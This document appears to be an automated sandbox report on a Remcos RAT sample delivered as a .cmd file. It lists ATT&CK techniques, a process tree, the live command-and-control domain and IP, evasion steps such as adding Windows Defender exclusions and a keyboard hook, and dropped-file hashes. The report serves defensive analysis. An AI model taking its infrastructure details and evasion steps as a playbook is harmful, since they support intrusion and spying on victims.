    Source: Yara match, File source: C:\Users\user\AppData\Roaming\brotha\logs.dat, type: DROPPED

    Remote Access Functionality

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutex created: \Sessions\1\BaseNamedObjects\Rmc-K9847Q
    Source: Yara match, File source: C:\Users\user\AppData\Roaming\brotha\logs.dat, type: DROPPED
    MITRE ATT&CK Matrix (one line per tactic; the numbers shown before a technique are the report's signature-hit counters)

    Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
    Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
    Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
    Execution: 1 Windows Management Instrumentation, 112 Command and Scripting Interpreter, 1 PowerShell, Cron, Launchd, Scheduled Task
    Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
    Privilege Escalation: 12 Process Injection, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
    Defense Evasion: 1 Masquerading, 1 Disable or Modify Tools, 41 Virtualization/Sandbox Evasion, 12 Process Injection, 1 Obfuscated Files or Information, 1 DLL Side-Loading
    Credential Access: 11 Input Capture, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
    Discovery: 21 Security Software Discovery, 2 Process Discovery, 41 Virtualization/Sandbox Evasion, 1 Application Window Discovery, 1 File and Directory Discovery, 21 System Information Discovery
    Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
    Collection: 11 Input Capture, 1 Archive Collected Data, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
    Command and Control: 1 Encrypted Channel, 1 Non-Standard Port, 1 Remote Access Software, 1 Ingress Tool Transfer, 2 Non-Application Layer Protocol, 12 Application Layer Protocol
    Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
    Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
    Behavior Graph (ID: 1431053; Sample: UrgenteNotificationRef.cmd; Startdate: 24/04/2024; Architecture: WINDOWS; Score: 100)

    Sample-level signatures: Antivirus detection for URL or domain; Yara detected Remcos RAT; Sigma detected: Remcos; Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
    Contacted hosts: embargogo237.duckdns.org (45.74.19.121, ports 10521, 49737; HVC-ASUS, United States; Uses dynamic DNS services); geoplugin.net (178.237.33.50, ports 49739, 80; ATOM86-ASATOM86NL, Netherlands)

    Process tree (graph node numbers in parentheses, matched signatures in brackets):
    cmd.exe (13) [Very long command line found]
      conhost.exe (21)
      cmd.exe (18) [Very long command line found]
        conhost.exe (31)
        cmd.exe (33)
        powershell.exe (27) [Suspicious powershell command line found; Adds a directory exclusion to Windows Defender]; drops C:\Users\user\AppData\...79etwork28681Man.cmd (DOS)
          cmd.exe (35) [Very long command line found]
            conhost.exe (47)
            cmd.exe (44) [Very long command line found]
              conhost.exe (60)
              cmd.exe (62)
              powershell.exe (55) [Detected Remcos RAT; Suspicious powershell command line found; Adds a directory exclusion to Windows Defender; Installs a global keyboard hook]; connects to embargogo237.duckdns.org and geoplugin.net; drops C:\Users\user\AppData\Roaming\...\logs.dat (data)
                powershell.exe (64) [Loading BitLocker PowerShell Module]
                  conhost.exe (73)
                powershell.exe (67)
                  conhost.exe (75)
                powershell.exe (69)
                powershell.exe (71)
          powershell.exe (38) [Loading BitLocker PowerShell Module]
            conhost.exe (49)
          powershell.exe (40)
            conhost.exe (51)
          2 other processes (42)
            conhost.exe (53)
    cmd.exe (16)
      conhost.exe (23)
      conhost.exe (25)

    Antivirus detection (Source: Detection, Scanner, Label)

    UrgenteNotificationRef.cmd: 11%, ReversingLabs
    No Antivirus matches
    No Antivirus matches

    geoplugin.net: 4%, Virustotal

    http://geoplugin.net/json.gp: 100%, URL Reputation, phishing
    http://crl.m: 0%, URL Reputation, safe
    http://pesterbdd.com/images/Pester.png: 100%, URL Reputation, malware
    https://contoso.com/: 0%, URL Reputation, safe
    https://contoso.com/License: 0%, URL Reputation, safe
    https://contoso.com/Icon: 0%, URL Reputation, safe
    http://crl.microsoft0: 0%, Avira URL Cloud, safe
    Contacted domains (Name, IP, Active, Malicious, Antivirus Detection, Reputation)

    embargogo237.duckdns.org, 45.74.19.121, active: true, malicious: true, reputation: unknown
    geoplugin.net, 178.237.33.50, active: true, malicious: false, reputation: unknown

    Contacted URLs (Name, Malicious, Antivirus Detection, Reputation)

    http://geoplugin.net/json.gp, malicious: true, antivirus detection: URL Reputation: phishing, reputation: unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.1710436376.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1765702553.0000000005A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://aka.ms/winsvr-2022-pshelp | powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2105453899.0000000000A88000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://crl.m | powershell.exe, 0000000C.00000002.1857143467.0000000007CD2000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware; URL Reputation: malware | unknown
    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000007.00000002.1704963199.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.0000000004B14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.1670797373.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1670797373.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1704963199.0000000004551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1882584365.0000000004937000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1882584365.0000000004949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004961000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000007.00000002.1704963199.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.0000000004B14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://contoso.com/ | powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.1710436376.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1765702553.0000000005A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://contoso.com/License | powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://contoso.com/Icon | powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.1670797373.0000000005502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1704963199.0000000004551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1882584365.0000000004965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004961000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://github.com/Pester/Pester | powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://crl.microsoft0 | powershell.exe, 00000017.00000002.1893864511.0000000006FC0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
    45.74.19.121 | embargogo237.duckdns.org | United States | | 29802 | HVC-ASUS | true
    178.237.33.50 | geoplugin.net | Netherlands | | 8455 | ATOM86-ASATOM86NL | false
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1431053
                        Start date and time:2024-04-24 14:09:37 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 12s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of new started processes analysed:33
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:UrgenteNotificationRef.cmd
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winCMD@43/40@2/2
                        EGA Information:
                        • Successful, ratio: 40%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 275
                        • Number of non-executed functions: 28
                        Cookbook Comments:
                        • Found application associated with file extension: .cmd
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 7548 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7680 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7884 because it is empty
                        • Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
    Time | Type | Description
    13:10:45 | Task Scheduler | Run new task: OneNote 28681 path: C:\Users\user\AppData\Roaming\Network28681Man.cmd
    14:10:29 | API Interceptor | 222901x Sleep call for process: powershell.exe modified
    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
    45.74.19.121 | URGENTE_NOTIFICATION.cmd | Get hash | malicious | Remcos, DBatLoader | Browse |
    | cf9dPUbn3C.exe | Get hash | malicious | Remcos | Browse |
    | 3hHHxU2r9a.exe | Get hash | malicious | Remcos | Browse |
    | April_2024_discount_Voucher-Unique-d-File.cmd | Get hash | malicious | Unknown | Browse |
    | AprilDiscountVoucher.exe | Get hash | malicious | Quasar | Browse |
    | April_2024_discount_Voucher-Unique-d-File.bat | Get hash | malicious | Unknown | Browse |
    178.237.33.50 | 107. PN-EN-1090-2+A1_2012P.exe | Get hash | malicious | GuLoader, Remcos | Browse | geoplugin.net/json.gp
    | URGENTE_NOTIFICATION.cmd | Get hash | malicious | Remcos, DBatLoader | Browse | geoplugin.net/json.gp
    | OKhCyJ619J.rtf | Get hash | malicious | Remcos, DBatLoader | Browse | geoplugin.net/json.gp
    | fu56fbrtn8.exe | Get hash | malicious | Remcos, DBatLoader | Browse | geoplugin.net/json.gp
    | 1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
    | #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe | Get hash | malicious | GuLoader, Remcos | Browse | geoplugin.net/json.gp
    | TcnD64eVFK.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
    | DHL Express Courier Pickup Confirmation CBJ231025122456.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
    | Quotation.xls | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
    | BRUFEN ORDER VAC442_7467247728478134247.vbs | Get hash | malicious | GuLoader, Remcos | Browse | geoplugin.net/json.gp
    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
    geoplugin.net | 107. PN-EN-1090-2+A1_2012P.exe | Get hash | malicious | GuLoader, Remcos | Browse | 178.237.33.50
    | URGENTE_NOTIFICATION.cmd | Get hash | malicious | Remcos, DBatLoader | Browse | 178.237.33.50
    | OKhCyJ619J.rtf | Get hash | malicious | Remcos, DBatLoader | Browse | 178.237.33.50
    | fu56fbrtn8.exe | Get hash | malicious | Remcos, DBatLoader | Browse | 178.237.33.50
    | 1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
    | #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe | Get hash | malicious | GuLoader, Remcos | Browse | 178.237.33.50
    | HFiHWvPsvA.rtf | Get hash | malicious | Remcos, DBatLoader | Browse | 178.237.33.50
    | TcnD64eVFK.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
    | DHL Express Courier Pickup Confirmation CBJ231025122456.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
    | Quotation.xls | Get hash | malicious | Remcos | Browse | 178.237.33.50
    embargogo237.duckdns.org | URGENTE_NOTIFICATION.cmd | Get hash | malicious | Remcos, DBatLoader | Browse | 45.74.19.121
    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
    HVC-ASUS | URGENTE_NOTIFICATION.cmd | Get hash | malicious | Remcos, DBatLoader | Browse | 45.74.19.121
    | https://magnisteel.lk/4765445b-32c6-49b0-83e6-1d93765276ca.php | Get hash | malicious | HTMLPhisher | Browse | 107.155.77.34
    | YKLjlQEZKY.elf | Get hash | malicious | Mirai | Browse | 46.21.151.191
    | SocUwyIjOh.elf | Get hash | malicious | Mirai | Browse | 46.21.151.165
    | Payment Advice.exe | Get hash | malicious | AgentTesla | Browse | 94.100.26.91
    | https://freesnippingtool.com/ | Get hash | malicious | Unknown | Browse | 23.111.140.234
    | Credit_Details21367163050417024.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse | 107.155.77.34
    | RFQ183494.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse | 107.155.77.34
    | setup.msi | Get hash | malicious | ScreenConnect Tool | Browse | 23.227.196.172
    | cf9dPUbn3C.exe | Get hash | malicious | Remcos | Browse | 45.74.19.121
    ATOM86-ASATOM86NL | 107. PN-EN-1090-2+A1_2012P.exe | Get hash | malicious | GuLoader, Remcos | Browse | 178.237.33.50
    | URGENTE_NOTIFICATION.cmd | Get hash | malicious | Remcos, DBatLoader | Browse | 178.237.33.50
    | OKhCyJ619J.rtf | Get hash | malicious | Remcos, DBatLoader | Browse | 178.237.33.50
    | fu56fbrtn8.exe | Get hash | malicious | Remcos, DBatLoader | Browse | 178.237.33.50
    | 1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
    | #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe | Get hash | malicious | GuLoader, Remcos | Browse | 178.237.33.50
    | TcnD64eVFK.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
    | DHL Express Courier Pickup Confirmation CBJ231025122456.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
    | Quotation.xls | Get hash | malicious | Remcos | Browse | 178.237.33.50
    | BRUFEN ORDER VAC442_7467247728478134247.vbs | Get hash | malicious | GuLoader, Remcos | Browse | 178.237.33.50
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):965
                                    Entropy (8bit):5.0061630437862155
                                    Encrypted:false
                                    SSDEEP:12:tkbOnd6UGkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkw7T:qbCdVauKyGX85jrvXhNlT3/7sYDsro
                                    MD5:664DA71A99A7A7C426134240B73EF767
                                    SHA1:33EAC84BB6B07F00593F05413A64CD8738B8A6E7
                                    SHA-256:146F13F7649B0BB05ECAA2386D7E8DC23E5BA7B69A36919E17E994E63E9F7BA5
                                    SHA-512:DCA9DC8FE7ED040B134D138846C0F3BA940DBCBE9883E19E704D06B8CA737E3FE4EE08AC5F98814E804E7D7716B580FBC4F7971AAD9DDC3887565FD07C4C674D
                                    Malicious:false
                                    Preview:{. "geoplugin_request":"154.16.105.36",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):5829
                                    Entropy (8bit):4.898126932363785
                                    Encrypted:false
                                    SSDEEP:96:VCJ2Woe5n2k6Lm5emmXIG2gyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smAFRLcU6Y:oxoe5nVsm5emdTgkjDt4iWN3yBGHB9sX
                                    MD5:BB4887302071210501E562B7868F4DF8
                                    SHA1:AF2EBC1E83EDBC3D13356AD8EF498ED6B7B881EA
                                    SHA-256:C6DD78956B6C260612ED364D8A71CB09FC7CE4C93EC0AC103B2A085EA38D2579
                                    SHA-512:56D17DFA9407A23AAE28C930C8CF6A34FDC0AE8DE145B772F127DA2D055F243395CF1BEC8F0892BB0F73EFD6726D73A80A94BC08E3027FD02DB33AA8BBD15C93
                                    Malicious:false
                                    Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Preview:@...e...........................................................
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):2248
                                    Entropy (8bit):5.385419090103669
                                    Encrypted:false
                                    SSDEEP:48:VWSU4y4RQmFoUeWmfgZ9tK8NPVEm7u1iMuge//ZDUyu2hlheK2:VLHyIFKL3IZ2KttOugPgd2
                                    MD5:F53DE0258A1B6BBAB91C21D80E3B059B
                                    SHA1:5794C02A64C5F0ED7CADBA531FE966F3E34DAB99
                                    SHA-256:B1607713F4FDAC5D64AB8118D9511FC697886D55D5ACED74E153C52C99EAC356
                                    SHA-512:12DEF3F2A20D388DE695E0793E04EBEA9089629DFA97FEB5C4AF0020D1936149E810577501E9F99FDAB3F3274AA1454BEAD96DDF88CAEB601A13DE0441DD8AA0
                                    Malicious:false
                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
